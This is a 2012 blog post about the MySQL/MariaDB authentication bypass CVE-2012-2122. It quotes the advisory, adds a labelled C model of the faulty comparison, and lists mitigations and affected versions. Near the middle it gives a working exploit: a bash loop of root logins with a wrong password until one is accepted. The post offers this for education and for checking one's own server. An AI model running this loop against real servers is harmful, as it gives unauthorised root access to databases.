
Uncool MySQL/MariaDB Vulnerability causes people to pack spare underwear just in case this happens again

posted Jun 11, 2012, 1:12 PM by Leigh Williams   [ updated Jun 11, 2012, 1:39 PM ]
Since I read this post, I couldn't stop laughing, crying and clicking my heels. Honestly, this is bad news for anyone who doesn't follow the basics of securing their servers and who believes that exposing a database server to the internet or to the whole organization "is not such a bad idea" because everyone does it.
Well, today I really hope that those people realize just how bad it actually is. Below is a summary of the vulnerability (CVE-2012-2122), quoted from Sergei Golubchik's advisory on the oss-security list:
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256"
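To make the "incorrect casting" concrete, here is an added C model of the flawed comparison. It is not MySQL's source and not part of the original post. It assumes a my_bool typedef of plain char (which is what MySQL's my_bool is), a constructed 20-byte expected token, and a constructed wide_memcmp() that stands in for an optimised libc memcmp whose result is not confined to -128..127; the check functions and the counting loop are written for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Added example modelling the flawed comparison in CVE-2012-2122; it is not
 * MySQL's source. MySQL's my_bool is a plain char, and the scramble check
 * returned memcmp()'s int result through that type, so an int such as 256
 * or -512 was truncated to 0 and read as "token matches". */
typedef char my_bool;
#define SHA1_HASH_SIZE 20

typedef int (*cmp_fn)(const void *, const void *, size_t);

/* Constructed stand-in for an optimised memcmp (not glibc's code): it returns
 * the difference of the first mismatching 32-bit chunk, so its result is not
 * confined to -128..127. That is the property the advisory says makes a
 * particular build exploitable. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *p = a, *q = b;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t x = ((uint32_t)p[i] << 24) | ((uint32_t)p[i + 1] << 16) |
                     ((uint32_t)p[i + 2] << 8) | p[i + 3];
        uint32_t y = ((uint32_t)q[i] << 24) | ((uint32_t)q[i + 1] << 16) |
                     ((uint32_t)q[i + 2] << 8) | q[i + 3];
        if (x != y)
            return (int)(x - y);       /* non-zero, but maybe a multiple of 256 */
    }
    for (; i < n; i++)                  /* tail bytes, if n is not a multiple of 4 */
        if (p[i] != q[i])
            return p[i] - q[i];
    return 0;
}

/* Vulnerable shape: the int comparison result is returned through a char,
 * and the caller treats 0 as "password correct". */
static my_bool check_scramble_vulnerable(const unsigned char *expected,
                                         const unsigned char *token, cmp_fn cmp)
{
    return cmp(expected, token, SHA1_HASH_SIZE);   /* int silently truncated to char */
}

/* Fixed shape: reduce the result to 0/1 while it is still an int, so no
 * high bits are lost before the caller tests it. */
static my_bool check_scramble_fixed(const unsigned char *expected,
                                    const unsigned char *token, cmp_fn cmp)
{
    return cmp(expected, token, SHA1_HASH_SIZE) != 0;
}

/* Try every value of token bytes 2 and 3 (65535 wrong tokens plus the genuine
 * one) against a constructed expected token and count how many wrong tokens
 * the given check accepts when paired with wide_memcmp. */
static int count_false_accepts(my_bool (*check)(const unsigned char *,
                                                const unsigned char *, cmp_fn))
{
    unsigned char expected[SHA1_HASH_SIZE], token[SHA1_HASH_SIZE];
    int accepted = 0, v;
    for (v = 0; v < SHA1_HASH_SIZE; v++)
        expected[v] = (unsigned char)(0xA5 ^ v);    /* constructed stored hash */
    memcpy(token, expected, SHA1_HASH_SIZE);
    for (v = 0; v < 65536; v++) {
        token[2] = (unsigned char)(v >> 8);
        token[3] = (unsigned char)(v & 0xFF);
        if (memcmp(token, expected, SHA1_HASH_SIZE) == 0)
            continue;                               /* skip the genuine token */
        if (check(expected, token, wide_memcmp) == 0)
            accepted++;                             /* 0 means "login ok" */
    }
    return accepted;
}

int main(void)
{
    printf("vulnerable check accepts %d of 65535 wrong tokens (roughly 1 in 256)\n",
           count_false_accepts(check_scramble_vulnerable));
    printf("fixed check accepts %d of 65535 wrong tokens\n",
           count_false_accepts(check_scramble_fixed));
    return 0;
}
```

Build it with any C99 compiler. Every wrong token whose chunk difference is a multiple of 256 (here: same byte 3, different byte 2) truncates to 0 in the vulnerable check and is accepted, 255 of 65535 in this sweep, which is the roughly 1 in 256 the advisory quotes; the fixed check accepts none. Whether a real server is affected depends on what its libc's memcmp returns for mismatching buffers, which is why the same server version could be safe on one platform and wide open on another.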

Exploit (please use it only for educational purposes or as proof of concept for the skeptics):
for i in {1..300}; do mysql -u root --password=bad -h yourhostname 2>/dev/null; done
If the above doesn't work, then Google it.

The 2>/dev/null redirects the "Access denied" errors you don't want to see into /dev/null. You don't have to use it, but it keeps the output quiet and lets you watch, for interest's sake, how long it takes before one attempt is accepted and you land at a mysql> prompt on the target.

Defense (mostly mitigation; upgrading is the actual fix):
1.) Bind the MySQL daemon to localhost: set bind-address = 127.0.0.1 under [mysqld] in my.cnf, so remote clients never reach the authentication handshake at all.
2.) Don't expose your database servers to the internet, and restrict access within the organization to the hosts that actually need it.
3.) Upgrade to a version past those listed below; the fix is a one-line correction to the comparison in sql/password.c.
Note that the bug only triggers on builds where memcmp() can return values outside -128..127 (typically 64-bit builds with an SSE-optimised memcmp), so the same version may be safe on one platform and exploitable on another. The loop above, run against your own server, is a quick way to check whether a given build is affected.

Affected Versions:
All MySQL and MariaDB versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 and later, and MySQL 5.1.63, 5.5.24, 5.6.6 and later, carry the fix.